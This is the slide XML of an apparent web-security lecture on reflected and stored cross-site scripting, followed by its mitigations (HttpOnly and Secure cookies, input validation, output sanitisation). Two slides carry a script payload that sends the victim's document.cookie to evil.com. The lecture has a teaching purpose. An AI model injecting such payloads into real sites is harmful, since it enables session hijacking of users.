              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b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6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3526972" y="4027713"/>
            <a:ext cx="3396342" cy="39810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923314" y="4027713"/>
            <a:ext cx="435429" cy="3981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710613" y="4881178"/>
            <a:ext cx="1583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Results for:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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30" b="11799"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3294060" y="4855809"/>
            <a:ext cx="2095500" cy="163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05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Reflected XSS Attack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7531" y="1716057"/>
            <a:ext cx="10506269" cy="9758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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.websearch.com/search?q=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.write(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'&lt;img </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>="http://evil.com/?'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'"&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);&lt;/script&gt;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286" y="4650111"/>
            <a:ext cx="1005227" cy="100522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40298" y="5779222"/>
            <a:ext cx="31692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Origin: www.websearch.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>session=xI4f-Qs02fd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709019" y="6176529"/>
            <a:ext cx="10565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evil.com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550" y="3094062"/>
            <a:ext cx="893446" cy="89344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550" y="5269304"/>
            <a:ext cx="893446" cy="89344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327312" y="4034121"/>
            <a:ext cx="1819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websearch.com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585" y="5069440"/>
            <a:ext cx="641882" cy="64188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36" y="3076421"/>
            <a:ext cx="1245186" cy="1245186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3891215" y="5190325"/>
            <a:ext cx="4761373" cy="520997"/>
            <a:chOff x="3891215" y="5190325"/>
            <a:chExt cx="4761373" cy="520997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29" name="Straight Arrow Connector 28"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3891215" y="5505062"/>
              <a:ext cx="4761373" cy="20626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 rot="165159">
              <a:off x="5316028" y="5190325"/>
              <a:ext cx="22028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4) GET /?session=…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710222" y="3052867"/>
            <a:ext cx="2719709" cy="1597244"/>
            <a:chOff x="1710222" y="3052867"/>
            <a:chExt cx="2719709" cy="1597244"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="19" name="Curved Connector 18"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="18" idx="3"/>
              <a:endCxn id="11" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1710222" y="3699014"/>
              <a:ext cx="1714678" cy="951097"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector2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2122598" y="3052867"/>
              <a:ext cx="230733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1) Send malicious link to the victim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818615" y="3509684"/>
            <a:ext cx="4578936" cy="1182798"/>
            <a:chOff x="3818615" y="3509684"/>
            <a:chExt cx="4578936" cy="1182798"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Straight Arrow Connector 21"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3818615" y="3509684"/>
              <a:ext cx="4578936" cy="1182798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 rot="20724147">
              <a:off x="4431969" y="3737297"/>
              <a:ext cx="29962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2) GET </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
                <a:t>search?q</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>=&lt;script&gt;…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927513" y="3987508"/>
            <a:ext cx="4488699" cy="1165217"/>
            <a:chOff x="3927513" y="3987508"/>
            <a:chExt cx="4488699" cy="1165217"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23" name="Straight Arrow Connector 22"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="11" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3927513" y="3987508"/>
              <a:ext cx="4488699" cy="116521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 rot="20724147">
              <a:off x="4950758" y="4215746"/>
              <a:ext cx="22152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3) HTTP/1.1 200 OK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331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Vulnerable Website, Type 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730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Suppose we have a social network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.friendly.com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67543" y="2898710"/>
            <a:ext cx="8870302" cy="3719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79983" y="2911150"/>
            <a:ext cx="8857862" cy="64070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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   friendly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3253274" y="3032448"/>
            <a:ext cx="3396342" cy="39810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36980" y="3772676"/>
            <a:ext cx="20172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What’s going on?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2805404" y="4172786"/>
            <a:ext cx="6363478" cy="152510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I hope you like pop-tarts ;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.body.style.backgroundImage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(' http://img.com/nyan.jpg ')"&lt;/script&gt;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520474" y="5816081"/>
            <a:ext cx="1648408" cy="44787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Update Status</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="176116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Vulnerable Website, Type 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730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Suppose we have a social network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.friendly.com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67543" y="2898710"/>
            <a:ext cx="8870302" cy="3719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30" b="11799"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1567543" y="3551852"/>
            <a:ext cx="8870302" cy="30666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79983" y="2911150"/>
            <a:ext cx="8857862" cy="64070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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   friendly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3253274" y="3032448"/>
            <a:ext cx="3396342" cy="39810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36980" y="3772676"/>
            <a:ext cx="248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Latest Status Updates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3533191" y="4282526"/>
            <a:ext cx="5567266" cy="74178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I hope you like pop-tarts ;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Monday, March 23, 2015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80" y="4282526"/>
            <a:ext cx="741784" cy="74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14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Stored XSS Attack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48605" y="1655431"/>
            <a:ext cx="9019591" cy="9758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/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'&lt;img </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>="http://evil.com/?'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'"&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);&lt;/script&gt;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938" y="4739432"/>
            <a:ext cx="1005227" cy="100522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54906" y="5882073"/>
            <a:ext cx="28312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Origin: www.friendly.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>session=xI4f-Qs02fd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709019" y="6176529"/>
            <a:ext cx="10565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evil.com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550" y="3094062"/>
            <a:ext cx="893446" cy="89344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550" y="5269304"/>
            <a:ext cx="893446" cy="89344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498032" y="4034121"/>
            <a:ext cx="14784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friendly.com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585" y="5069440"/>
            <a:ext cx="641882" cy="64188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27" y="3540785"/>
            <a:ext cx="1245186" cy="1245186"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="Group 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5307691" y="5224046"/>
            <a:ext cx="3344897" cy="487276"/>
            <a:chOff x="5307691" y="5224046"/>
            <a:chExt cx="3344897" cy="487276"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29" name="Straight Arrow Connector 28"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5307691" y="5557252"/>
              <a:ext cx="3344897" cy="15407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 rot="165159">
              <a:off x="5878715" y="5224046"/>
              <a:ext cx="22028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5) GET /?session=…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307691" y="3638353"/>
            <a:ext cx="3344897" cy="1101079"/>
            <a:chOff x="5307691" y="3638353"/>
            <a:chExt cx="3344897" cy="1101079"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Straight Arrow Connector 21"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5307691" y="3638353"/>
              <a:ext cx="3344897" cy="1101079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 rot="20496064">
              <a:off x="5342946" y="3799599"/>
              <a:ext cx="30878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3) GET /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
                <a:t>profile.php?uid</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>=…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5508441" y="3976776"/>
            <a:ext cx="3144148" cy="1044932"/>
            <a:chOff x="5508441" y="3976776"/>
            <a:chExt cx="3144148" cy="1044932"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23" name="Straight Arrow Connector 22"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5508441" y="3976776"/>
              <a:ext cx="3144148" cy="1044932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 rot="20488569">
              <a:off x="6177014" y="4431822"/>
              <a:ext cx="22152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4) HTTP/1.1 200 OK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260330" y="4176550"/>
            <a:ext cx="3107608" cy="1065496"/>
            <a:chOff x="1260330" y="4176550"/>
            <a:chExt cx="3107608" cy="1065496"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="26" name="Straight Arrow Connector 25"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="11" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1260330" y="4564443"/>
              <a:ext cx="3107608" cy="677603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 rot="772489">
              <a:off x="1531450" y="4176550"/>
              <a:ext cx="27927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2) Send link to attacker’s profile to the victim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356049" y="2907711"/>
            <a:ext cx="7321420" cy="1123113"/>
            <a:chOff x="1356049" y="2907711"/>
            <a:chExt cx="7321420" cy="1123113"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Freeform 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1356049" y="2907711"/>
              <a:ext cx="7321420" cy="1123113"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 7321420"/>
                <a:gd name="connsiteY0" fmla="*/ 1123113 h 1123113"/>
                <a:gd name="connsiteX1" fmla="*/ 1150775 w 7321420"/>
                <a:gd name="connsiteY1" fmla="*/ 258477 h 1123113"/>
                <a:gd name="connsiteX2" fmla="*/ 5200261 w 7321420"/>
                <a:gd name="connsiteY2" fmla="*/ 3440 h 1123113"/>
                <a:gd name="connsiteX3" fmla="*/ 7321420 w 7321420"/>
                <a:gd name="connsiteY3" fmla="*/ 395326 h 1123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21420" h="1123113">
                  <a:moveTo>
                    <a:pt x="0" y="1123113"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="142032" y="784101"/>
                    <a:pt x="284065" y="445089"/>
                    <a:pt x="1150775" y="258477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2017485" y="71865"/>
                    <a:pt x="4171820" y="-19368"/>
                    <a:pt x="5200261" y="3440"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6228702" y="26248"/>
                    <a:pt x="6775061" y="210787"/>
                    <a:pt x="7321420" y="395326"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="57150">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:headEnd type="non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 rot="21434316">
              <a:off x="3324046" y="3025549"/>
              <a:ext cx="33886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1) Post malicious JS to profile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80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2ABE93-0934-473D-83D0-4EBD2CEA8C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7684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C9CC24-B375-4226-BF2B-61FADBBA6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70A28E-4FD8-4474-A206-E15B5EBB3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084747"/>
            <a:ext cx="12188952" cy="3294207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9647E21-5366-4638-AC97-D8CD4111E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r="8214" b="45501"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="0" y="0"/>
            <a:ext cx="12191999" cy="4473360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FF7209-A312-4DEB-AF4B-B10AC2C38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925" y="2076450"/>
            <a:ext cx="10684151" cy="13451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Mitigating XSS Attacks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5C076-930D-4BC9-9CBD-94A6B8000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71575" y="4473360"/>
            <a:ext cx="9469211" cy="8656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800" kern="12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76591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Mitigating XSS Attacks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81777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Client-side defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie restrictions – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and Secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-side filter – X-XSS-Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enables heuristics in the browser that attempt to block injected scripts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Server-side defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="937584" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>x = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>request.args.get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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="937584" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>is_valid_base64(x): abort(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>500</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Output filtering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="312528" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"content"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{{sanitize(data)}}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="227618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HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Cookies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One approach to defending against cookie stealing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HttpOnly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/>
              <a:t>cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server may specify that a cookie should not be exposed in the DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But they are still sent with requests as normal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not to be confused with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies marked as Secure may only be sent over HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Website designers should, ideally, enable both features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> prevent all attacks?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Of course not, it only prevents cookie theft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
